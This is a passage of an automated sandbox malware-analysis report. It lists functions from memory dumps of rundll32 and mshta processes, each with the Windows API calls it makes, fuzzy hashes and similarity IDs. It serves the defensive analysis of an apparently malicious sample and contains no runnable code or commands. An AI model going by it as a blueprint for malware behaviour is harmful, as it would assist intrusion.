Instruction Fuzzy Hash: 6B217F75A00218BFCB10DFA4CCC8D9EBBBDEF49756F0084A5F906DB252D630AA05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004571B4, Relevance: 3.0, APIs: 2, Instructions: 43sleepmemoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004571BD
Sleep.KERNELBASE(00000000), ref: 0045720A

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 2145bb0f7d0d0117ea57793e9ce958dce71ba56e4761af2c5b3c1fe7fd477d37
Instruction ID: 8e640b62293f340a6a31e289fe5e8f954754dcbfeb5ed8e49cc5d00b1b5e3de1
Opcode Fuzzy Hash: 2145bb0f7d0d0117ea57793e9ce958dce71ba56e4761af2c5b3c1fe7fd477d37
Instruction Fuzzy Hash: D4F08132A087006AD320ABA9FC85B1B76E8DB48757F11443AFD04D22A3D768D84C8A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00455127, Relevance: 3.0, APIs: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000008,00000000,00455B62,?), ref: 0045512D

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

wsprintfW.USER32 ref: 00455156

Part of subcall function 00451790: memset.NTDLL ref: 004517AC
Part of subcall function 00451790: GetLastError.KERNEL32 ref: 004517E8

Part of subcall function 00454962: HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1672627171-0
Opcode ID: caae301419b2ff00939459a57ae2aacf15ab81b6fb6efce8dc1ff1df06256ffe
Instruction ID: f321b03eeb139956048598c706b07bb0f45d84f59f38920020045f35708be15e
Opcode Fuzzy Hash: caae301419b2ff00939459a57ae2aacf15ab81b6fb6efce8dc1ff1df06256ffe
Instruction Fuzzy Hash: 87F0BE32910B15AFC621A7699C44E6BBBA8EF84323B024022F90097223C634D8198BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00455DA6, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

RtlQueryPerformanceFrequency.NTDLL(?,?,?,?,00451886), ref: 00455DB0
RtlQueryPerformanceCounter.NTDLL(?,?,?,?,00451886), ref: 00455DBA

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: c90f6d59b81fa6c5c70a4e5516c558e9e5cca46f578677c5115adece8a3443fb
Instruction ID: 44fa7bbbc08ab01059a7d2ca2edddaa4c78eba6c51679c68ab54f01498ee4ceb
Opcode Fuzzy Hash: c90f6d59b81fa6c5c70a4e5516c558e9e5cca46f578677c5115adece8a3443fb
Instruction Fuzzy Hash: 9FD06736C0020DBBCF01ABE4DD098EEBF7EFB08705F4008A1A621A1062D73596659B55

Uniqueness

Uniqueness Score: -1.00%

Function 004552A2, Relevance: 1.6, APIs: 1, Instructions: 79comCOMMON

Download Yara Rule

APIs

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

CoCreateInstance.OLE32(?,00000000,00000004,008B92DC,00000000), ref: 004552D0

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AllocateCreateHeapInstance
String ID:
API String ID: 2928441540-0
Opcode ID: 79de107ef754790da842ce08c22873d4d250ea8a18b3802e1d0440085724b13b
Instruction ID: 7ddbfed4bd108ee6e84e4c9b3c9671b7ff0b1dd7ec2202d87ec461c65e9c3d57
Opcode Fuzzy Hash: 79de107ef754790da842ce08c22873d4d250ea8a18b3802e1d0440085724b13b
Instruction Fuzzy Hash: 0F217C75600704EFD710CFA4C898FAA73B8EF89746F204499FA09CB252D774E905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004578FD, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00457915

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 828bf0adabe31a9837439592502d08526867189edfdf409a5bff8fbcadf38c77
Instruction ID: 11ad3f5806422a14986a14ad4130c90f3139bbdbb5e4951f1de89ad684fea069
Opcode Fuzzy Hash: 828bf0adabe31a9837439592502d08526867189edfdf409a5bff8fbcadf38c77
Instruction Fuzzy Hash: A61127712853449FEB058F29D881BEA7BA5DB23319F14409AE8808B393C27B890FC764

Uniqueness

Uniqueness Score: -1.00%

Function 00453AD4, Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000001,008B9380,?), ref: 00453B0D

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 5226c64b41a27583aa3809c512992f5c010bf632924b4419e6be8ca044a811bf
Instruction ID: 8f8f9e2c133d77cbfb853d508f041d67a121910b58d466667ab748ce5263172c
Opcode Fuzzy Hash: 5226c64b41a27583aa3809c512992f5c010bf632924b4419e6be8ca044a811bf
Instruction Fuzzy Hash: 9C01B571A00619BFDB00CFA8C885E9AB7B8FF48715F008159FD05DB252D770EA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00455C3C, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f504c6b8943891c96701c1b19fdd11dedc44b3a4104f988ce73b70a219f6e64
Instruction ID: 3c1fdcedb163e99f344765d73e4de92c4b5bb0d5029db413644e8a48464bf2dc
Opcode Fuzzy Hash: 8f504c6b8943891c96701c1b19fdd11dedc44b3a4104f988ce73b70a219f6e64
Instruction Fuzzy Hash: F4B01231440300EFCA114B80DD48F067B61E750B02F018030B200000F183318420EB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00458F07, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004592E6: GetProcAddress.KERNEL32(?,004517DA,00000000), ref: 00459301

Part of subcall function 00451098: memset.NTDLL ref: 004510FF
Part of subcall function 00451098: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0045113D
Part of subcall function 00451098: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00451151
Part of subcall function 00451098: CloseHandle.KERNELBASE(?), ref: 00451168
Part of subcall function 00451098: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00451174
Part of subcall function 00451098: lstrcat.KERNEL32(?,?), ref: 004511B5
Part of subcall function 00451098: FindFirstFileA.KERNELBASE(?,?), ref: 004511CB

Part of subcall function 00453F33: lstrlen.KERNEL32(0045B0B0,00000000,0045B0B0,?,00451990,?), ref: 00453F3C
Part of subcall function 00453F33: mbstowcs.NTDLL ref: 00453F63
Part of subcall function 00453F33: memset.NTDLL ref: 00453F75

HeapFree.KERNEL32(00000000,0045B060,0045B060), ref: 00458F56

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: File$memset$AddressCloseCreateFindFirstFreeHandleHeapProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 184000759-0
Opcode ID: db054bca1f38703e78cb344e3dff4536ef02886f190f0fdcec34397040d14d35
Instruction ID: 2fd2edebdbfcf75962d22a62524dc0eda77135ba9010ffa68cf7625a6266d605
Opcode Fuzzy Hash: db054bca1f38703e78cb344e3dff4536ef02886f190f0fdcec34397040d14d35
Instruction Fuzzy Hash: 8E012633700209AEE7105BE6CC80B7A3296EB49367F14007FFD44E6192CE6CCC4A566C

Uniqueness

Uniqueness Score: -1.00%

Function 00455184, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004578FD: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00457915

Part of subcall function 00455365: lstrlen.KERNEL32(00000000,00000000,?,00000000,0045B058), ref: 0045539E
Part of subcall function 00455365: StrStrA.SHLWAPI(00000000,?), ref: 004553AB
Part of subcall function 00455365: RtlAllocateHeap.NTDLL(00000000,?), ref: 004553D0
Part of subcall function 00455365: memcpy.NTDLL(00000000,00000000,00000000), ref: 004553E2
Part of subcall function 00455365: memcpy.NTDLL(00000000,00000000,?,00000000,00000000,00000000), ref: 004553F3
Part of subcall function 00455365: memcpy.NTDLL(00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0045540D
Part of subcall function 00455365: HeapFree.KERNEL32(00000000,00000000), ref: 0045541E

HeapFree.KERNEL32(00000000,0045B060,?), ref: 004551FA

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Heap$memcpy$AllocateFree$lstrlen
String ID:
API String ID: 1339332770-0
Opcode ID: 73c183f55012d11f74f411e515b548361c5bc0b53760a5411b43b7551ac6eec2
Instruction ID: eadd3cdce0d1d9b433950ad037ddb0c80447600d4a8894439c1c6dd1a82a4388
Opcode Fuzzy Hash: 73c183f55012d11f74f411e515b548361c5bc0b53760a5411b43b7551ac6eec2
Instruction Fuzzy Hash: 51119131600B05AFD7218B99DC40E6777E8EB40312F1441AAFD56D7262E635ED05DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00457435, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0045747A

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d240948a75fdfcf6a6e94114ccda9e26f158d6c08999b821b3afe7f24e82f108
Instruction ID: 1ca887cb3e4f2c25f4a9e905d8288a21822266a49991383356676691c5805ca7
Opcode Fuzzy Hash: d240948a75fdfcf6a6e94114ccda9e26f158d6c08999b821b3afe7f24e82f108
Instruction Fuzzy Hash: D4F03171C04209EFDB10DF94D488AEEBB78EF05311F1081BAE91263242D7785B45DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00454962, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 24d5332fc05679d2da94c7ed4004882c782c4d83df56b33957ada2a5fbc699d5
Instruction ID: b3f20e021f0fe304a07629c45eeb45a894f6012be95f833d80813bf6fbbffee3
Opcode Fuzzy Hash: 24d5332fc05679d2da94c7ed4004882c782c4d83df56b33957ada2a5fbc699d5
Instruction Fuzzy Hash: B1B01231440300EFCA214F80DD44F067A22E750B02F018030B200041F18331C421FB5C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00455D33, Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00455D3B
GetVersion.KERNEL32 ref: 00455D4A
GetCurrentProcessId.KERNEL32 ref: 00455D61
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00455D7E
GetLastError.KERNEL32 ref: 00455D9D

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: aa155da5b2111d5a3eb36d10c39c435db471a024129577613c433013a0c12f99
Instruction ID: 15e84166d6389edfb81b55ab2b14f20b64186a3b6a87cf59f723d80455b60f0e
Opcode Fuzzy Hash: aa155da5b2111d5a3eb36d10c39c435db471a024129577613c433013a0c12f99
Instruction Fuzzy Hash: 0EF03771A427059FD7209F64AC9D72B3BB0EB04F53F10856AB91AD62E3E374C4098B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00454A81, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00455118

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: e96ca9fe042317159879a13080d0b444ca028e4e6bb5188b72a467b48bbdbeed
Instruction ID: 1196f34f6a3d564f8091abfa65c821b890d0a560c14cc698ad9686854910de71
Opcode Fuzzy Hash: e96ca9fe042317159879a13080d0b444ca028e4e6bb5188b72a467b48bbdbeed
Instruction Fuzzy Hash: 9722847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 0045A190, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 633069e118f84e65a3b25058e050e0464620c9b2d4b2a09469a108067a884a4b
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 4A21F8329002049FCB10DF69C8C1967BBA5FF48310F0582AAEC199B346D735F929C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00459E3F, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00459EB8
LoadLibraryA.KERNEL32(?), ref: 00459F35
GetLastError.KERNEL32 ref: 00459F41
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00459F74

Strings

$, xrefs: 00459E8D

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 81c9363f31385b45e9c2dd5bf418e78e3ce8fe0b22a3872718f733129eee8b92
Instruction ID: d5dd4ae78cfc38ef30a37817f6f0c7224135b75e7ed08f2e1a865996d334f0b6
Opcode Fuzzy Hash: 81c9363f31385b45e9c2dd5bf418e78e3ce8fe0b22a3872718f733129eee8b92
Instruction Fuzzy Hash: 77814D71A003059FDB10CFA8D880AAEB7F5FB48712F14812AE915E7382E774ED08CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00458F95, Relevance: 16.7, APIs: 11, Instructions: 160memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00458FAC

Part of subcall function 00454977: WaitForSingleObject.KERNEL32(00000000,0045B0B0), ref: 00454A29

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0045906A
GetTickCount.KERNEL32 ref: 0045907A
RtlEnterCriticalSection.NTDLL(0045C2C4), ref: 0045908E
RtlLeaveCriticalSection.NTDLL(0045C2C4), ref: 004590AC
StrTrimA.SHLWAPI(00000000,0045B280), ref: 004590DE
HeapFree.KERNEL32(00000000,?,00000000), ref: 00459151
HeapFree.KERNEL32(00000000,00000000,?), ref: 00459161
HeapFree.KERNEL32(00000000,00000000,?), ref: 0045916F
HeapFree.KERNEL32(00000000,?), ref: 00459180
HeapFree.KERNEL32(00000000,?), ref: 0045918E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Heap$Free$CountCriticalSectionTick$AllocateEnterLeaveObjectSingleTrimWait
String ID:
API String ID: 448949543-0
Opcode ID: a3f88d980438dbbef16f833271b22525e3e5fa3d4744f784efa2ffdefb29e0fd
Instruction ID: 6d11b7991f090515748a2457fb434edc91fed10d21a2f17f3ffa24d7d3439a4f
Opcode Fuzzy Hash: a3f88d980438dbbef16f833271b22525e3e5fa3d4744f784efa2ffdefb29e0fd
Instruction Fuzzy Hash: 72519D71500304EFD7219FA5EC88E1B7BA8EB88717B050429F919D22B3D734D905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00458D2B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00458DD8
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00458DEE
memset.NTDLL ref: 00458E8E
memset.NTDLL ref: 00458E9E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 01ee955f5222539dc42b3a3d3d98fae40efb2e7a5fd15fd06c6df5818c6ef138
Instruction ID: 08dde76d51ae688f7c2616086751b92712d5b20ca544401f2c0fc64c05c4b2a4
Opcode Fuzzy Hash: 01ee955f5222539dc42b3a3d3d98fae40efb2e7a5fd15fd06c6df5818c6ef138
Instruction Fuzzy Hash: E341A231A00219ABDB109FA9DC81BEE77B4EF55315F10852EFC15AB282DF789E5C8B44

Uniqueness

Uniqueness Score: -1.00%

Function 00459A49, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,0045B068), ref: 00459A5B

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

ResetEvent.KERNEL32(?), ref: 00459ACF
GetLastError.KERNEL32 ref: 00459AF2
GetLastError.KERNEL32 ref: 00459B9D

Part of subcall function 00454962: HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 8a3686254d01feb2bff6ee1771f41383e4d2525e3dee463102094f2e1deb528a
Instruction ID: 5bac19a6037ab8fe2657a92bceb26328d1da1095a7e3fc6e0f32e163ab902eb6
Opcode Fuzzy Hash: 8a3686254d01feb2bff6ee1771f41383e4d2525e3dee463102094f2e1deb528a
Instruction Fuzzy Hash: E5415E71500704FFE7219FA2DC89D6B7BB9EB84B06B10492AB946911A3D774E948CA28

Uniqueness

Uniqueness Score: -1.00%

Function 00452E83, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00452E9A
SetEvent.KERNEL32(?), ref: 00452EAA
GetLastError.KERNEL32 ref: 00452F33

Part of subcall function 00452D0F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00452D2A

Part of subcall function 00454962: HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

GetLastError.KERNEL32(00000000), ref: 00452F68

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 4ef2f7706d70b00a2979c691c00ea63bc7bf156ce48a2ff0b00a45c59a6b427d
Instruction ID: b17e000d1fa41fc90083de7a1922ee2f0585dbbf74edf702a98f5bb45c3b72a4
Opcode Fuzzy Hash: 4ef2f7706d70b00a2979c691c00ea63bc7bf156ce48a2ff0b00a45c59a6b427d
Instruction Fuzzy Hash: 18314F72900309EFDB20DF95D980AAFBBB8EB05341F10456BE901A2252D774DA49DF64

Uniqueness

Uniqueness Score: -1.00%

Function 004593DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004533D0,00000000,?,?,0045191E,?,0045C304), ref: 004593E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 00459400
memcpy.NTDLL(00000000,0045C304,-00000008,?,?,?,004533D0,00000000,?,?,0045191E,?,0045C304), ref: 00459444
memcpy.NTDLL(00000001,0045C304,00000001,0045191E,?,0045C304), ref: 00459465

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: ffd9ed44f60f9c19bfa97df3f940dc9d981e2dfbf2c14c28d865cf7652cda14b
Instruction ID: da1339bcf84fa2a1592f686e90c7ced4faa774964592280181fdfd79675b86e9
Opcode Fuzzy Hash: ffd9ed44f60f9c19bfa97df3f940dc9d981e2dfbf2c14c28d865cf7652cda14b
Instruction Fuzzy Hash: 0011C672A00314AFC7108FA9DC84D9EBBADDB81762B050176F905D7292E774DE09D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00455673, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0045C24C), ref: 0045567E
SleepEx.KERNEL32(00000064,00000001), ref: 0045568D
CloseHandle.KERNEL32(0045C24C), ref: 004556AE
HeapDestroy.KERNEL32(0045C218), ref: 004556BE

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 272b1f04a6b60ae585ecc6c788829823f5c50e8db126d172ec8bcf4717f9773c
Instruction ID: cf3a1a9420da589d0fb3e509bef15532916210677f418705fae8ad99136abd9d
Opcode Fuzzy Hash: 272b1f04a6b60ae585ecc6c788829823f5c50e8db126d172ec8bcf4717f9773c
Instruction Fuzzy Hash: CBF01C31B027509BD6109BB9EC98B2737A8EB04B63B450161BC19D63E3DB24D8488A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00452CAF, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0045C2C4), ref: 00452CB8
Sleep.KERNEL32(0000000A,?,0045C00C,00000000,?,>E,0045C280,?,>E,0045C280,?,?,?,00453EEC), ref: 00452CC2
HeapFree.KERNEL32(00000000,00000000), ref: 00452CEA
RtlLeaveCriticalSection.NTDLL(0045C2C4), ref: 00452D06

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 9d9f3d9560ed5606aff2238585228869262c85e3f1257ffbc19787836154af7d
Instruction ID: b03fabeb08a2bdee8e705c7a4182542ebad9a33e660af056389482549cd5906d
Opcode Fuzzy Hash: 9d9f3d9560ed5606aff2238585228869262c85e3f1257ffbc19787836154af7d
Instruction Fuzzy Hash: 93F0D4712003409FD7259B68DE89B1B37A4EB11B47B04842AFC52E73A3C764E945DA6D

Uniqueness

Uniqueness Score: -1.00%

Function 004543A3, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0045C2C4), ref: 004543AC
Sleep.KERNEL32(0000000A,?,0045C00C,00000000,?,>E,0045C280,?,>E,0045C280,?,?,?,00453EEC), ref: 004543B6
HeapFree.KERNEL32(00000000), ref: 004543E4
RtlLeaveCriticalSection.NTDLL(0045C2C4), ref: 004543F9

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 6fca083a22914c3006094a5b78b50d185f8a32e03df6a8824d14e4cd00ba499d
Instruction ID: f805806c75870b9908797477ec59c8006c9b14cbe950948c3fc2d30984b0e128
Opcode Fuzzy Hash: 6fca083a22914c3006094a5b78b50d185f8a32e03df6a8824d14e4cd00ba499d
Instruction Fuzzy Hash: F5F0AF752003009FE7288B54DD89B2A37A4EB44B07B048029EC029A3B3C728ED459A6C

Uniqueness

Uniqueness Score: -1.00%

Function 004597D5, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,?,0045B068,?,?,0045585D,?,?,?,?,00000102,004549B8,?,?,0045B0B0), ref: 004597E1

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0045585D,?,?,?,?,00000102,004549B8,?), ref: 0045983F
lstrcpy.KERNEL32(00000000,00000000), ref: 0045984F
lstrcpy.KERNEL32(00000000,00000000), ref: 0045985B

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 6937fd5643a7566d91f5f0f3e480deb68aea1d5270330b0bd331e0effdfb103d
Instruction ID: d458171039c713332b55eb389e14677d670378b0f2bab157f0bd8f6f0815792a
Opcode Fuzzy Hash: 6937fd5643a7566d91f5f0f3e480deb68aea1d5270330b0bd331e0effdfb103d
Instruction Fuzzy Hash: 3D21AC72404319EBCB126F65C844EAF7FA8DF46786B14806AFC059B213D739CD09C7A9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 3584 Parent PID: 1432 mshta.exeCOMMON

Executed Functions

Function 025B0FDF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2531352962.025B0000.00000010.00000001.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_25b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: a2eb5689115dc6acc976ca2d1100eb54c5f55d6a9eee1fe6d75af123bb86cbc0
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 025B0FE7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2531352962.025B0000.00000010.00000001.sdmp, Offset: 025B0000, based on PE: false

